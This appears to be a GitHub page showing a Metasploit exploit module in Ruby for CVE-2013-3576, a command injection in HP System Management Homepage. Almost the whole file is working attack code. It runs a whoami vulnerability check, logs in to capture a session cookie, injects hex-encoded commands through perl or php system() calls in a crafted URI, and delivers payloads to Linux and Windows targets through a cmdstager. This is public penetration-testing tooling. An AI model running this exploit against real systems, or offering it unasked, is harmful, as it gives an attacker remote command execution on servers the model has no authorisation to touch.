/
hp_sys_mgmt_exec.rb
202 lines (166 loc) · 5.42 KB
/
hp_sys_mgmt_exec.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "HP System Management Homepage JustGetSNMPQueue Command Injection",
'Description' => %q{
This module exploits a vulnerability found in HP System Management Homepage. By
supplying a specially crafted HTTP request, it is possible to control the
'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc),
which will be used in a exec() function.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Markus Wulftange', # Discovery & multi-platform Metasploit module
'sinn3r' # initial Windows Metasploit module
],
'References' =>
[
['CVE', '2013-3576'],
['OSVDB', '94191'],
['US-CERT-VU', '735364']
],
'DefaultOptions' =>
{
'SSL' => true
},
'Platform' => %w{ linux win },
'Targets' =>
[
['Linux', {
'Platform' => 'linux',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => 'bourne'
}],
['Linux (x64)', {
'Platform' => 'linux',
'Arch' => ARCH_X64,
'CmdStagerFlavor' => 'bourne'
}],
['Windows', {
'Platform' => 'win',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => 'vbs'
}],
['Windows (x64)', {
'Platform' => 'win',
'Arch' => ARCH_X64,
'CmdStagerFlavor' => 'vbs'
}],
],
'Privileged' => false,
'DisclosureDate' => '2013-06-11'
))
register_options(
[
Opt::RPORT(2381),
# USERNAME/PASS may not be necessary, because the anonymous access is possible
OptString.new("USERNAME", [false, 'The username to authenticate as']),
OptString.new("PASSWORD", [false, 'The password to authenticate with'])
])
end
def post_auth?
true
end
def check
@cookie = ''
sig = Rex::Text.rand_text_alpha(10)
cmd = "echo #{sig}&&whoami&&echo #{sig}"
res = send_command(cmd)
if not res
vprint_error("Connection timed out")
return Exploit::CheckCode::Unknown
end
if res.code == 200 && res.body =~ /#{sig}/
vprint_good("Running with user '#{res.body.split(sig)[1].strip}'")
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def login
username = datastore['USERNAME']
password = datastore['PASSWORD']
cookie = ''
res = send_request_cgi({
'method' => 'POST',
'uri' => '/proxy/ssllogin',
'vars_post' => {
'redirecturl' => '',
'redirectquerystring' => '',
'user' => username,
'password' => password
}
})
if not res
fail_with(Failure::Unknown, "#{peer} - Connection timed out during login")
end
# CpqElm-Login: success
if res.headers['CpqElm-Login'].to_s =~ /success/
cookie = res.get_cookies.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
end
cookie
end
def setup_stager
execute_cmdstager(:temp => './', :linemax => 2800)
end
def execute_command(cmd, opts={})
# Encodes command as sequence of hex values to be passed to the Perl/PHP
# function `pack("N*", ...)` that is then used in a `system(...)` call.
# trailing bytes need to be handled separately
rem = cmd.size % 4
if rem != 0
last_bytes = ".chr(#{cmd[-rem..-1].each_byte.map(&:ord).join(").chr(")})"
cmd = cmd[0...-rem]
end
# convert double words into hex representation
dwords = cmd.each_byte.each_slice(4).map { |dw|
sprintf("0x%x", dw.pack("C*").unpack("N")[0])
}
# build final Perl/PHP code that is getting executed
script_code = "system(pack(chr(78).chr(42),#{dwords.join(",")})#{last_bytes});"
# build Perl/PHP invocation command
case target.opts['Platform']
# Perl for Linux as it's more likely to be in the PATH
when "linux" then cmd = "perl -e '#{script_code}'"
# PHP for Windows
when "win" then cmd = "php -r #{script_code}"
end
res = send_command(cmd)
if res && res.code != 200
vprint_error("Unexpected response:\n#{res}")
fail_with(Failure::Unknown, "There was an unexpected response")
end
end
def send_command(cmd)
if !datastore['USERNAME'].to_s.empty? && !datastore['PASSWORD'].to_s.empty? && @cookie.empty?
@cookie = login
if @cookie.empty?
fail_with(Failure::NoAccess, "#{peer} - Login failed")
else
print_good("Logged in as '#{datastore['USERNAME']}'")
end
end
req_opts = {}
req_opts['uri'] = generate_uri(cmd)
unless @cookie.empty?
browser_chk = 'HPSMH-browser-check=done for this session'
curl_loc = "curlocation-#{datastore['USERNAME']}="
req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
end
send_request_raw(req_opts)
end
def generate_uri(cmd)
"#{normalize_uri("smhutil","snmpchp/")}&#{cmd.gsub(/ /, "%20")}&&echo"
end
def exploit
@cookie = ''
setup_stager
end
end